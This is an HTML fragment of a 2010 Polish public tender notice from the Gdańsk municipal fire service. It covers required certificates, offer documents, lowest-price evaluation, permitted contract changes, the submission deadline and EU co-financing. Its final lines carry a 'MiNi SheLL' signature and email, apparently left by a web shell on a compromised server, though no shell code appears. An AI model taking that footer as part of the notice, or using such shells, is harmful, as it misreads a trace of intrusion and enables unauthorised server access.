<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty wg wzoru stanowiącego Załącznik nr 1 do SIWZ.
2.	Dowód wniesienia wadium.
3.	Pełnomocnictwo, złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza, w przypadku gdy formularz ofertowy lub załączone do niego dokumenty są podpisane przez osobę, której umocowanie do reprezentowania Wykonawcy nie wynika z wpisu do właściwego rejestru lub ewidencji działalności gospodarczej lub ofertę składają podmioty wspólnie ubiegające się o udzielenie zamówienia.
4.	Wykaz robót  budowlanych i usług , których realizację Wykonawca zamierza powierzyć podwykonawcom - Załącznik nr 6 do SIWZ.
5.	Parafowany projekt umowy - Załącznik Nr 7 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	W zakresie istotnych postanowień umowy strony przewidują możliwość wprowadzenia następujących zmian w umowie:
i.	zmiana terminu wykonania umowy lub poszczególnych jej etapów:
a.	w przypadku udzielenia zamówienia na roboty dodatkowe w sytuacji, o której mowa w art. 67 ust. 1 pkt 5) ustawy z dnia z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj. Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zm.), jeżeli jego wykonanie będzie skutkowało wydłużeniem terminu wykonania zamówienia podstawowego; zmiana terminu nastąpi o czas ustalony przez strony niezbędny do wykonania zamówienia wraz z robotami dodatkowymi,
b.	w przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, w szczególności działania siły wyższej, niekorzystnych warunków atmosferycznych o charakterze szczególnym, niewystępujących w danej porze roku w strefie klimatycznej uniemożliwiających prowadzenie robót budowlanych, jeżeli ich wystąpienie bezpośrednio będzie skutkowało wydłużeniem terminu wykonania zamówienia podstawowego; 
c.	w przypadku wystąpienia okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymania prowadzenia robót,
d.	w zakresie prowadzenia robót budowlanych w przypadku nie wydania przez organy administracji publicznej lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezależnych od Wykonawcy, w tym również niewydania przez te organy i podmioty w terminach określonych w obowiązujących przepisach stosownych rozstrzygnięć w przedmiocie wymaganych decyzji, zezwoleń i uzgodnień. 
W sytuacjach określonych w pkt b-d zmiana terminu nastąpi o czas ustalony przez strony, nie dłuższy niż okres przerwy lub przestoju spowodowany powyższymi okolicznościami.
ii.	zmiana w zakresie przedmiotu zamówienia:
a.	jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa; zmiana nastąpi w sposób mający na celu dostosowanie przedmiotu zamówienia do obowiązujących przepisów, 
iii.	zmiany wysokości wynagrodzenia:
a.	w przypadku wejścia w życie w trakcie realizacji zamówienia przepisów wprowadzających zmiany w wysokości stawek podatku VAT, zmiana wynagrodzenia nastąpi poprzez przyjęcie stawki VAT w zmienionej wysokości.
iv.	zmiana osób uczestniczących po stronie Wykonawcy w wykonaniu niniejszej umowy, które wskazane zostały w ofercie Wykonawcy w ramach wykazu osób, które będą uczestniczyć w wykonaniu zadania jest dopuszczalna jedynie wówczas, gdy nowa osoba posiada kwalifikacje i doświadczenie odpowiadające co najmniej osobie zastępowanej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kmpsp.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Miejska Państwowej Straży Pożarnej w Gdańsku
ul. Beniowskiego 7, 80-382 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2010 godzina 11:00, miejsce: Komenda Miejska Państwowej Straży Pożarnej w Gdańsku
ul. Beniowskiego 7, 80-382 Gdańsk, sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Współfinansowanie projektu dotyczącego wydatków kwalifikowanych w wysokości 68,49 % w ramach osi priorytetowej Regionalnego Programu Operacyjnego rozdział 7.2 Zintegrowany System Ratownictwa, ogólnej wartości 31,51 % budżetu państwa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com